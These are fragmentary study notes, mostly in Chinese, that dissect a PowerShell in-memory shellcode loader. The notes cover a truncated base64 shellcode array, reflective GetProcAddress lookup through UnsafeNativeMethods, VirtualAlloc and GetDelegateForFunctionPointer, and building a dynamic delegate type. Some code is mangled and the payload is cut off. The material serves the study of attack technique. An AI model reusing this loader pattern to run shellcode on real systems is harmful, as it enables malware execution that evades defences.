[IntPtr]::size -eq 8

x86 为“4”，x64 为“8” ；

https://blog.kenaro.com/2010/12/08/how-to-determine-current-powershell-session-is-x86-or-x64/

[Byte[]]$var_code = [System.Convert]::FromBase64String('bnlicXZrqsZros8DIy

$ EncodedText =“VABoAGkAcwAgAGkAcwAgAGEAIABzAGUAYwByAGUAdAAgAGEAbgBkACAAcwBoAG8AdQBsAGQAIABiAGUAIABoAGkAZABlAG4A”$ DecodedText = [System.Text.Encoding] :: Unicode.GetString（[System.Convert] :: FromBase64String（$ EncodedText））$ DecodedText

GetDelegatForFunctionPointer

当我们实例化委托时，我们可以将其实例与具有兼容签名和返回类型的任何方法相关联。那么可以通过委托实例调用（或调用）该方法。

[System.Runtime.InteropServices.Marshal]::Copy：将数据从非托管内存指针复制到托管单精度浮点数数组

GetDelegateForFunctionPointer，VirtualAlloc

$var_module$var_procedure

([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')

[AppDomain]::CurrentDomain.GetAssemblies()

Microsoft.Win32.UnsafeNativeMethods is an internal class that cannot be referenced through any direct means.

If you try to reference the class, you will get an error stating that its module is not loaded. Microsoft.Win32.UnsafeNativeMethods is implemented within System.dll in the GAC.https://twitter.com/mattifestation

$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))

GetMethod(String, Type[])

https://docs.microsoft.com/en-us/dotnet/api/system.type.getmethod?view=netcore-3.1#System_Type_GetMethod_System_String_System_Type___

func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])func_get_delegate_type @([IntPtr]) ([Void])

Param([Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,  [Parameter(Position = 1)][Type]$var_return_type = [Void])

DefineDynamicAssembly(AssemblyName,AssemblyBuilderAccess) 定义具有指定名称和访问权限的动态程序集。DefineDynamicAssembly(AssemblyName, AssemblyBuilderAccess, IEnumerable<CustomAttributeBuilder>) 定义具有指定名称、访问权限和属性的新程序集。

public static System.Reflection.Emit.AssemblyBuilder DefineDynamicAssembly(System.Reflection.AssemblyName name, System.Reflection.Emit.AssemblyBuilderAccess access);

$1 = [AppDomain]::CurrentDomain.DefineDynamicAssembly($2,$3)$2 = New-Object System.Reflection.AssemblyName('ReflectedDelegate')$3 = [System.Reflection.Emit.AssemblyBuilderAccess]::Run

.DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])

AssemblyBuilder.DefineDynamicModule：在这个程序集中定义一个动态模块。ModuleBuilder.DefineType：定义类型

RTSpecialName：表示公共语言运行时检查名称编码。HideBySig：表示方法按名称和签名隐藏；否则，仅通过名称。Public：表示该方法可被此对象在其范围内的任何对象访问。

指定由公共语言运行时确定的默认调用约定。将此调用约定用于静态方法。例如或虚拟方法使用HasThis.

Runtime：指定方法实现由运行时提供Managed：指定在托管代码中实现该方法。

https://docs.microsoft.com/en-us/dotnet/api/system.reflection.emit.typebuilder.definemethod?view=netcore-3.1#System_Reflection_Emit_TypeBuilder_DefineMethod_System_String_System_Reflection_MethodAttributes_System_Reflection_CallingConventions_System_Type_System_Type___System_Type___System_Type___System_Type_____System_Type_____